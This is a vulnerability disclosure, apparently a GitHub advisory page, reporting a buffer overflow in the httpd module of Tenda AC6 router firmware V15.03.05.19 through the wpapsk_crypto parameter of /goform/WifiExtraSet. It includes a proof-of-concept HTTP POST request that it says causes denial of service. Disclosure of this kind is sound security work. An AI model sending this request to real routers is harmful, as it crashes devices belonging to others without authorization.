Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

Description

Tenda Router AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

Firmware information

Affected version

Vulnerability details

This vulnerability lies in the /goform/WifiExtraSet page,The details are shown below:

image-20221119202100670

POC

This POC can result in a Dos.

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.204.133
Content-Length: 247
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

image-20221118151225120